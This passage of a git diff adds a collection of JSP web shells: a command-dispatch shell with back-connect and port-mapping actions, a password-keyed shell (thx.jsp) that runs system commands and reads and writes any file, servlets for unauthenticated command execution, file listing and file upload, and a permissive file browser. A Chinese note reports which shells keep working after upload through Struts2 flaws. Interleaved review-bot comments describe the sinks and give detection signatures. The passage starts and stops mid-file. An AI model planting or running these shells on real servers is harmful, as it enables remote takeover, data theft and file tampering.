VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); 
+} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/other/thx.jsp b/jsp/hackk8/JSP/other/thx.jsp new file mode 100644 index 0000000..7c9cbe4 --- /dev/null +++ b/jsp/hackk8/JSP/other/thx.jsp 
@@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="xc"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else 
if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/Struts2下shell兼容性报告_K8.txt b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt new file mode 100644 index 0000000..28a6646 --- /dev/null +++ b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt 
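Review bot: Nothing in thx.jsp authenticates the caller or marks the file as a sample: the scriptlet selects its action from the request parameter named by `Pwd` ("xc"), the `M` branch builds `c` from `z1`/`z2` and passes it to `Runtime.getRuntime().exec(c)`, and branches `C` and `D` open whatever path `z1` names for reading and writing. The same request-parameter-to-sink pattern recurs in later hunks on this page: CmdServlet.java concatenates `req.getParameter("cmd")` into `exec("cmd /c " + ...)`, and ListServlet.java passes `req.getParameter("file")` to `new File(path)`. If these files are kept for analysis, I would add a header comment to each, for example `<%-- Sample: web shell, kept for detection testing only --%>`, and keep them out of any path a servlet container serves. For detection, the fixed `->|` and `|<-` response delimiters and the `z0`/`z1`/`z2` parameter names visible in this hunk are usable signature material for request and response inspection.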
@@ -0,0 +1,54 @@
+
+struts2 环境下 jspshell 功能测试 2013.5.23 by 拉登哥哥
+看下这个报告 你们就知道 为啥s2上传的shell成功率低的原因了
+上传不成功或内容被过滤是另外的事 上传成功的shell没被过滤又不解析或报错 就是以下原因了
+
+struts 2.2.1.1 默认环境下 以下报告是在这版本下的 别的版本未知
+好像默认环境没带有IO操作 还有 org.apache.jasper(S2文件上传组件)
+自己找了无组件上传的jsp 也报废...
+
+
+K8收集的(其实之前也在网上问人要来的一些 wooyun某群群主 还有其它成员)
+
+k8cmd.jsp 兼容性非常好 不管在s2 还是普通环境下都正常使用
+实战 支持Win/Linux 还有执行的命令通过飞刀加密发送
+
+普通 cmd.jsp啥的 可以使用 不用说了 但是在linux下不行
+
+other下面的大马 丢到struts2环境下 没一个能正常解析的
+
+JspWebshell 1.2.jsp 能解析 但上传不了文件 好像是马写的有问题
+
+JavaShell.jsp jsp-reverse.jsp 也不能解析
+
+kbaidu8.jsp 兼容性8错 哥专用的 原版 jspspy 1.0 但是上传文件也是失败的 1.2版本的直接报废
+
+Customize.jsp 菜刀的jsp马 本地s2环境 报错 连接上也可以操作
+实战 通过struts2的洞 上传过去的 功能就废了(linux下) win的还未测试
+
+JSP无组件实现WEB上传.rar 也失效
+
+一句话jsp那个 可以传过去 但是无法写出文件
+
+
+77收集的几个 Win下测试
+
+browser.jsp 可以使用 但是文件上传功能报废 原因都是这个组件 org.apache.jasper
+
+还有是cmd相关的也可用 也只是win下的
+
+其它都是直接报废。。。。。
+
+法客工具包里的jsp
+no.jsp 其实是那个什么jsfoloer改的 也是上传文件功能不行 别的功能未测
+silic webshell.jsp 和no.jsp in.jsp都是jsfoloer改的
+
+JspSpyJDK5.jsp 报废
+
+ma2.jsp 能解析 但上传文件那失败 java.io.IOException: 这就是IO了
+ma3.jsp 直接报废 因为使用的是jasper
+ma1.jsp 和ma4.jsp job.jsp探针 能正常解析
+spjspshell.jsp 直接报废 同ma3.jsp 用的组件一样
+
+总结: 普通单纯执行cmd一类的都能正常运行,探针也是 个别大马也勉强 jspspy 1.0兼容性 比较靠普
+在这些样本里90%都挂了 实战中 也许有些站加了上传组件啥的 可能部分上传脚本还是能用的 具体自测
diff --git a/jsp/hackk8/jsp2/CmdServlet.class b/jsp/hackk8/jsp2/CmdServlet.class
new file mode 100644
index 0000000..4afd7f1
Binary files /dev/null and b/jsp/hackk8/jsp2/CmdServlet.class differ
diff --git a/jsp/hackk8/jsp2/CmdServlet.java b/jsp/hackk8/jsp2/CmdServlet.java
new file mode 100644
index 0000000..f9cb31a
--- /dev/null
+++ b/jsp/hackk8/jsp2/CmdServlet.java
@@ -0,0 +1,43 @@
+/*
+ * CmdServlet.java 20/01/2004
+ *
+ * @author The Dark Raver
+ * @version 0.1
+ */
+
+import java.io.*;
+import javax.servlet.*;
+import javax.servlet.http.*;
+
+
+public class CmdServlet extends HttpServlet {
+
+ public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+ res.setContentType("text/html");
+
+ PrintWriter out = res.getWriter();
+ out.print("");
+ out.print("

    "); + out.print(""); + out.print(""); + out.print("
    "); + + if(req.getParameter("cmd") != null) { + out.print("\n

    Command: " + req.getParameter("cmd") + "\n


    \n");
    +	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
    +	        DataInputStream procIn = new DataInputStream(p.getInputStream());
    +			int c='\0';
    +        	while ((c=procIn.read()) != -1) {
    +				out.print((char)c);
    +				}
    +	        }
    +
    +		out.print("\n
    "); + out.print(""); + } + + public String getServletInfo() { + return "CmdServlet 0.1"; + } + +} diff --git a/jsp/hackk8/jsp2/ListServlet.class b/jsp/hackk8/jsp2/ListServlet.class new file mode 100644 index 0000000..b816179 Binary files /dev/null and b/jsp/hackk8/jsp2/ListServlet.class differ diff --git a/jsp/hackk8/jsp2/ListServlet.java b/jsp/hackk8/jsp2/ListServlet.java new file mode 100644 index 0000000..1d97304 --- /dev/null +++ b/jsp/hackk8/jsp2/ListServlet.java @@ -0,0 +1,86 @@ +/* + * ListServlet.java + * + * @author Sierra + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.ServletException; +import javax.servlet.http.*; + +public class ListServlet extends HttpServlet +{ + + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + PrintWriter printwriter = res.getWriter(); + String path = req.getParameter("file"); + + printwriter.write("\n\nDirectory Listing\n\n\n"); + printwriter.write("\n"); + if(req.getParameter("file")==null) path = "c:\\"; + printwriter.write("

    Path: " + path + "


    \n");
    +
    +		File file = new File(path);
    +
    +		if(file.isDirectory())
    +		{
    +			String s = new String("Unknown");
    +			String s2 = new String("Black");
    +			File afile[] = file.listFiles();
    +			for(int i = 0; i < afile.length; i++)
    +			{
    +				String s1 = new String(afile[i].toString());
    +				printwriter.write("(");
    +				String s3;
    +				if(afile[i].isDirectory())
    +				{
    +					printwriter.write("d");
    +					s1 = s1 + "/";
    +					s3 = new String("Blue");
    +				} else
    +				if(afile[i].isFile())
    +				{
    +					printwriter.write("-");
    +					s3 = new String("Green");
    +				} else
    +				{
    +					printwriter.write("?");
    +					s3 = new String("Red");
    +				}
    +				if(afile[i].canRead())
    +					printwriter.write("r");
    +				else
    +					printwriter.write("-");
    +				if(afile[i].canWrite())
    +					printwriter.write("w");
    +				else
    +					printwriter.write("-");
    +				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n"); + } + + printwriter.write("
    "); + } else + if(file.canRead()) + { + FileInputStream fileinputstream = new FileInputStream(file); + int j = 0; + while(j >= 0) + { + j = fileinputstream.read(); + printwriter.write(j); + } + fileinputstream.close(); + } else + { + printwriter.write("Can't Read file
    "); + } + + } + + + public String getServletInfo() { + return "Directory Listing"; + } +} \ No newline at end of file diff --git a/jsp/hackk8/jsp2/UpServlet.class b/jsp/hackk8/jsp2/UpServlet.class new file mode 100644 index 0000000..fef990e Binary files /dev/null and b/jsp/hackk8/jsp2/UpServlet.class differ diff --git a/jsp/hackk8/jsp2/UpServlet.java b/jsp/hackk8/jsp2/UpServlet.java new file mode 100644 index 0000000..4936667 --- /dev/null +++ b/jsp/hackk8/jsp2/UpServlet.java @@ -0,0 +1,71 @@ +/* + * UpServlet.java 29/04/2005 + * + * @author The Dark Raver + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.*; +import javax.servlet.http.*; + + +public class UpServlet extends HttpServlet { + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + res.setContentType("text/html"); + PrintWriter out = res.getWriter(); + out.print(""); + out.print("
    "); + out.print("UPLOAD "); + out.print(""); + out.print("
    "); + out.print(""); + } + + + public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + String tag = new String(); + int c = '\0'; + int contador = 0; + ServletInputStream in = req.getInputStream(); + DataInputStream post = new DataInputStream(in); + + PrintWriter out = res.getWriter(); + res.setContentType("text/html"); + out.print("
    ");
    +
    +		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
    +			tag=tag.concat("" + (char)c);
    +			contador++;
    +			}
    +
    +		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
    +
    +		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
    +		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
    +
    +		// (!) Uploaded File Name
    +
    +		File newfile = new File("c:\\install.log");
    +
    +		/////////////////////////
    +
    +		FileOutputStream fileout = new FileOutputStream(newfile);
    +
    +		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
    +			c=post.read();
    +			fileout.write((char)c);
    +			}
    +
    +		fileout.close();
    +		out.print("<== OK");
    +
    +    }
    +
    +
    +    public String getServletInfo() {
    +		return "UpServlet 0.1";
    +    }
    +
    +}
    \ No newline at end of file
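Review bot: `doPost` in UpServlet.java accepts a POST body from any client and writes it to the fixed path `c:\install.log`, with no authentication and no size limit. The copy loop's bound comes from arithmetic on `req.getContentLength()`, and each `post.read()` result is written without a check for -1. As committed this is an unauthenticated file-write endpoint, so the header comment should say what the file is, for example by adding ` * Sample upload servlet, kept for detection testing only.` under the `@version` line. On a host, a servlet container process creating or overwriting `c:\install.log` is worth alerting on, presumably alongside the `UPLOAD` form string that `doGet` prints.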
    diff --git a/jsp/hackk8/jsp2/browser.jsp b/jsp/hackk8/jsp2/browser.jsp
    new file mode 100644
    index 0000000..7d85dc8
    --- /dev/null
    +++ b/jsp/hackk8/jsp2/browser.jsp
    @@ -0,0 +1,1802 @@
    +<%--
    +	jsp File browser 1.1a
    +	Copyright (C) 2003,2004, Boris von Loesch
    +	This program is free software; you can redistribute it and/or modify it under
    +	the terms of the GNU General Public License as published by the
    +	Free Software Foundation; either version 2 of the License, or (at your option)
    +	any later version.
    +	This program is distributed in the hope that it will be useful, but
    +	WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
    +	FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
    +	You should have received a copy of the GNU General Public License along with
    +	this program; if not, write to the
    +	Free Software Foundation, Inc.,
    +	59 Temple Place, Suite 330,
    +	Boston, MA 02111-1307 USA
    +	- Description: jsp File browser v1.1a -- This JSP program allows remote web-based
    +				file access and manipulation.  You can copy, create, move and delete files.
    +				Text files can be edited and groups of files and folders can be downloaded
    +				as a single zip file that's created on the fly.
    +	- Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
    +--%>
    +<%@page import="java.util.*,
    +                java.net.*,
    +                java.text.*,
    +                java.util.zip.*,
    +                java.io.*"
    +%>
    +<%!
    +    //FEATURES
    +    private static final boolean NATIVE_COMMANDS = true;
    +
    +    //Allow browsing and file manipulation only in certain directories
    +	private static final boolean RESTRICT_BROWSING = false;
    +    //If true, the user is allowed to browse only in RESTRICT_PATH,
    +    //if false, the user is allowed to browse all directories besides RESTRICT_PATH
    +    private static final boolean RESTRICT_WHITELIST = false;
    +    //Paths, sperated by semicolon
    +    //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
    +	private static final String RESTRICT_PATH = "/etc;/var";
    +
    +    //The refresh time in seconds of the upload monitor window
    +	private static final int UPLOAD_MONITOR_REFRESH = 2;
    +	//The number of colums for the edit field
    +	private static final int EDITFIELD_COLS = 85;
    +	//The number of rows for the edit field
    +	private static final int EDITFIELD_ROWS = 30;
    +	//Open a new window to view a file
    +	private static final boolean USE_POPUP = true;
    +	/**
    +	 * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
    +	 * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
    +	 * This can yield to performance issues. Turn it of, if the directory loads to slow.
    +	 */
    +	private static final boolean USE_DIR_PREVIEW = true;
    +	private static final int DIR_PREVIEW_NUMBER = 10;
    +	/**
    +	 * The name of an optional CSS Stylesheet file
    +	 */
    +	private static final String CSS_NAME = "Browser.css";
    +	/**
    +	 * The compression level for zip file creation (0-9)
    +	 * 0 = No compression
    +	 * 1 = Standard compression (Very fast)
    +	 * ...
    +	 * 9 = Best compression (Very slow)
    +	 */
    +	private static final int COMPRESSION_LEVEL = 1;
    +	/**
    +	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
    +	 * server runs on a windows platform, to avoid a message box, if you try to access
    +	 * an empty removable drive (See KNOWN BUGS in Readme.txt).
    +	 */
    +	private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
    +
    +	/**
    +	 * Command of the shell interpreter and the parameter to run a programm
    +	 */
    +	private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
    +	//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; 	// Unix
    +
    +	/**
    +	 * Max time in ms a process is allowed to run, before it will be terminated
    +	 */
    +	private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
    +
    +	//Button names
    +	private static final String SAVE_AS_ZIP = "Download selected files as zip";
    +	private static final String RENAME_FILE = "Rename File";
    +	private static final String DELETE_FILES = "Delete selected files";
    +	private static final String CREATE_DIR = "Create Dir";
    +	private static final String CREATE_FILE = "Create File";
    +	private static final String MOVE_FILES = "Move Files";
    +	private static final String COPY_FILES = "Copy Files";
    +
    +	//Normally you should not change anything after this line
    +	//----------------------------------------------------------------------------------
    +	//Change this to locate the tempfile directory for upload (not longer needed)
    +	private static String tempdir = ".";
    +	private static String VERSION_NR = "1.1a";
    +	private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
    +
    +	public class UplInfo {
    +
    +		public long totalSize;
    +		public long currSize;
    +		public long starttime;
    +		public boolean aborted;
    +
    +		public UplInfo() {
    +			totalSize = 0l;
    +			currSize = 0l;
    +			starttime = System.currentTimeMillis();
    +			aborted = false;
    +		}
    +
    +		public UplInfo(int size) {
    +			totalSize = size;
    +			currSize = 0;
    +			starttime = System.currentTimeMillis();
    +			aborted = false;
    +		}
    +
    +		public String getUprate() {
    +			long time = System.currentTimeMillis() - starttime;
    +			if (time != 0) {
    +				long uprate = currSize * 1000 / time;
    +				return convertFileSize(uprate) + "/s";
    +			}
    +			else return "n/a";
    +		}
    +
    +		public int getPercent() {
    +			if (totalSize == 0) return 0;
    +			else return (int) (currSize * 100 / totalSize);
    +		}
    +
    +		public String getTimeElapsed() {
    +			long time = (System.currentTimeMillis() - starttime) / 1000l;
    +			if (time - 60l >= 0){
    +				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
    +				else return time / 60 + ":0" + (time % 60) + "m";
    +			}
    +			else return time<10 ? "0" + time + "s": time + "s";
    +		}
    +
    +		public String getTimeEstimated() {
    +			if (currSize == 0) return "n/a";
    +			long time = System.currentTimeMillis() - starttime;
    +			time = totalSize * time / currSize;
    +			time /= 1000l;
    +			if (time - 60l >= 0){
    +				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
    +				else return time / 60 + ":0" + (time % 60) + "m";
    +			}
    +			else return time<10 ? "0" + time + "s": time + "s";
    +		}
    +
    +	}
    +
    +	public class FileInfo {
    +
    +		public String name = null, clientFileName = null, fileContentType = null;
    +		private byte[] fileContents = null;
    +		public File file = null;
    +		public StringBuffer sb = new StringBuffer(100);
    +
    +		public void setFileContents(byte[] aByteArray) {
    +			fileContents = new byte[aByteArray.length];
    +			System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
    +		}
    +	}
    +
    +	public static class UploadMonitor {
    +
    +		static Hashtable uploadTable = new Hashtable();
    +
    +		static void set(String fName, UplInfo info) {
    +			uploadTable.put(fName, info);
    +		}
    +
    +		static void remove(String fName) {
    +			uploadTable.remove(fName);
    +		}
    +
    +		static UplInfo getInfo(String fName) {
    +			UplInfo info = (UplInfo) uploadTable.get(fName);
    +			return info;
    +		}
    +	}
    +
    +	// A Class with methods used to process a ServletInputStream
    +	public class HttpMultiPartParser {
    +
    +		private final String lineSeparator = System.getProperty("line.separator", "\n");
    +		private final int ONE_MB = 1024 * 1;
    +
    +		public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
    +				int clength) throws IllegalArgumentException, IOException {
    +			if (is == null) throw new IllegalArgumentException("InputStream");
    +			if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
    +					"\"" + boundary + "\" is an illegal boundary indicator");
    +			boundary = "--" + boundary;
    +			StringTokenizer stLine = null, stFields = null;
    +			FileInfo fileInfo = null;
    +			Hashtable dataTable = new Hashtable(5);
    +			String line = null, field = null, paramName = null;
    +			boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
    +			boolean isFile = false;
    +			if (saveFiles) { // Create the required directory (including parent dirs)
    +				File f = new File(saveInDir);
    +				f.mkdirs();
    +			}
    +			line = getLine(is);
    +			if (line == null || !line.startsWith(boundary)) throw new IOException(
    +					"Boundary not found; boundary = " + boundary + ", line = " + line);
    +			while (line != null) {
    +				if (line == null || !line.startsWith(boundary)) return dataTable;
    +				line = getLine(is);
    +				if (line == null) return dataTable;
    +				stLine = new StringTokenizer(line, ";\r\n");
    +				if (stLine.countTokens() < 2) throw new IllegalArgumentException(
    +						"Bad data in second line");
    +				line = stLine.nextToken().toLowerCase();
    +				if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
    +						"Bad data in second line");
    +				stFields = new StringTokenizer(stLine.nextToken(), "=\"");
    +				if (stFields.countTokens() < 2) throw new IllegalArgumentException(
    +						"Bad data in second line");
    +				fileInfo = new FileInfo();
    +				stFields.nextToken();
    +				paramName = stFields.nextToken();
    +				isFile = false;
    +				if (stLine.hasMoreTokens()) {
    +					field = stLine.nextToken();
    +					stFields = new StringTokenizer(field, "=\"");
    +					if (stFields.countTokens() > 1) {
    +						if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
    +							fileInfo.name = paramName;
    +							String value = stFields.nextToken();
    +							if (value != null && value.trim().length() > 0) {
    +								fileInfo.clientFileName = value;
    +								isFile = true;
    +							}
    +							else {
    +								line = getLine(is); // Skip "Content-Type:" line
    +								line = getLine(is); // Skip blank line
    +								line = getLine(is); // Skip blank line
    +								line = getLine(is); // Position to boundary line
    +								continue;
    +							}
    +						}
    +					}
    +					else if (field.toLowerCase().indexOf("filename") >= 0) {
    +						line = getLine(is); // Skip "Content-Type:" line
    +						line = getLine(is); // Skip blank line
    +						line = getLine(is); // Skip blank line
    +						line = getLine(is); // Position to boundary line
    +						continue;
    +					}
    +				}
    +				boolean skipBlankLine = true;
    +				if (isFile) {
    +					line = getLine(is);
    +					if (line == null) return dataTable;
    +					if (line.trim().length() < 1) skipBlankLine = false;
    +					else {
    +						stLine = new StringTokenizer(line, ": ");
    +						if (stLine.countTokens() < 2) throw new IllegalArgumentException(
    +								"Bad data in third line");
    +						stLine.nextToken(); // Content-Type
    +						fileInfo.fileContentType = stLine.nextToken();
    +					}
    +				}
    +				if (skipBlankLine) {
    +					line = getLine(is);
    +					if (line == null) return dataTable;
    +				}
    +				if (!isFile) {
    +					line = getLine(is);
    +					if (line == null) return dataTable;
    +					dataTable.put(paramName, line);
    +					// If parameter is dir, change saveInDir to dir
    +					if (paramName.equals("dir")) saveInDir = line;
    +					line = getLine(is);
    +					continue;
    +				}
    +				try {
    +					UplInfo uplInfo = new UplInfo(clength);
    +					UploadMonitor.set(fileInfo.clientFileName, uplInfo);
    +					OutputStream os = null;
    +					String path = null;
    +					if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
    +							fileInfo.clientFileName));
    +					else os = new ByteArrayOutputStream(ONE_MB);
    +					boolean readingContent = true;
    +					byte previousLine[] = new byte[2 * ONE_MB];
    +					byte temp[] = null;
    +					byte currentLine[] = new byte[2 * ONE_MB];
    +					int read, read3;
    +					if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
    +						line = null;
    +						break;
    +					}
    +					while (readingContent) {
    +						if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
    +							line = null;
    +							uplInfo.aborted = true;
    +							break;
    +						}
    +						if (compareBoundary(boundary, currentLine)) {
    +							os.write(previousLine, 0, read - 2);
    +							line = new String(currentLine, 0, read3);
    +							break;
    +						}
    +						else {
    +							os.write(previousLine, 0, read);
    +							uplInfo.currSize += read;
    +							temp = currentLine;
    +							currentLine = previousLine;
    +							previousLine = temp;
    +							read = read3;
    +						}//end else
    +					}//end while
    +					os.flush();
    +					os.close();
    +					if (!saveFiles) {
    +						ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
    +						fileInfo.setFileContents(baos.toByteArray());
    +					}
    +					else fileInfo.file = new File(path);
    +					dataTable.put(paramName, fileInfo);
    +					uplInfo.currSize = uplInfo.totalSize;
    +				}//end try
    +				catch (IOException e) {
    +					throw e;
    +				}
    +			}
    +			return dataTable;
    +		}
    +
    +		/**
    +		 * Compares boundary string to byte array
    +		 */
    +		private boolean compareBoundary(String boundary, byte ba[]) {
    +			byte b;
    +			if (boundary == null || ba == null) return false;
    +			for (int i = 0; i < boundary.length(); i++)
    +				if ((byte) boundary.charAt(i) != ba[i]) return false;
    +			return true;
    +		}
    +
    +		/** Convenience method to read HTTP header lines */
    +		private synchronized String getLine(ServletInputStream sis) throws IOException {
    +			byte b[] = new byte[1024];
    +			int read = sis.readLine(b, 0, b.length), index;
    +			String line = null;
    +			if (read != -1) {
    +				line = new String(b, 0, read);
    +				if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
    +			}
    +			return line;
    +		}
    +
    +		public String getFileName(String dir, String fileName) throws IllegalArgumentException {
    +			String path = null;
    +			if (dir == null || fileName == null) throw new IllegalArgumentException(
    +					"dir or fileName is null");
    +			int index = fileName.lastIndexOf('/');
    +			String name = null;
    +			if (index >= 0) name = fileName.substring(index + 1);
    +			else name = fileName;
    +			index = name.lastIndexOf('\\');
    +			if (index >= 0) fileName = name.substring(index + 1);
    +			path = dir + File.separator + fileName;
    +			if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
    +			else return path.replace('/', File.separatorChar);
    +		}
    +	} //End of class HttpMultiPartParser
    +
    +	/**
    +	 * This class is a comparator to sort the filenames and dirs
    +	 */
    +	class FileComp implements Comparator {
    +
    +		int mode;
    +		int sign;
    +
    +		FileComp() {
    +			this.mode = 1;
    +			this.sign = 1;
    +		}
    +
    +		/**
    +		 * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
    +		 * The default sorting method is by Name
    +		 * Negative mode means descending sort
    +		 */
    +		FileComp(int mode) {
    +			if (mode < 0) {
    +				this.mode = -mode;
    +				sign = -1;
    +			}
    +			else {
    +				this.mode = mode;
    +				this.sign = 1;
    +			}
    +		}
    +
    +		public int compare(Object o1, Object o2) {
    +			File f1 = (File) o1;
    +			File f2 = (File) o2;
    +			if (f1.isDirectory()) {
    +				if (f2.isDirectory()) {
    +					switch (mode) {
    +					//Filename or Type
    +					case 1:
    +					case 4:
    +						return sign
    +								* f1.getAbsolutePath().toUpperCase().compareTo(
    +										f2.getAbsolutePath().toUpperCase());
    +					//Filesize
    +					case 2:
    +						return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
    +					//Date
    +					case 3:
    +						return sign
    +								* (new Long(f1.lastModified())
    +										.compareTo(new Long(f2.lastModified())));
    +					default:
    +						return 1;
    +					}
    +				}
    +				else return -1;
    +			}
    +			else if (f2.isDirectory()) return 1;
    +			else {
    +				switch (mode) {
    +				case 1:
    +					return sign
    +							* f1.getAbsolutePath().toUpperCase().compareTo(
    +									f2.getAbsolutePath().toUpperCase());
    +				case 2:
    +					return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
    +				case 3:
    +					return sign
    +							* (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
    +				case 4: { // Sort by extension
    +					int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
    +					int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
    +					if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
    +						return sign
    +								* f1.getAbsolutePath().toUpperCase().compareTo(
    +										f2.getAbsolutePath().toUpperCase());
    +					}
    +					// f1 has no extension
    +					else if (tempIndexf1 == -1) return -sign;
    +					// f2 has no extension
    +					else if (tempIndexf2 == -1) return sign;
    +					// Both have an extension
    +					else {
    +						String tempEndf1 = f1.getAbsolutePath().toUpperCase()
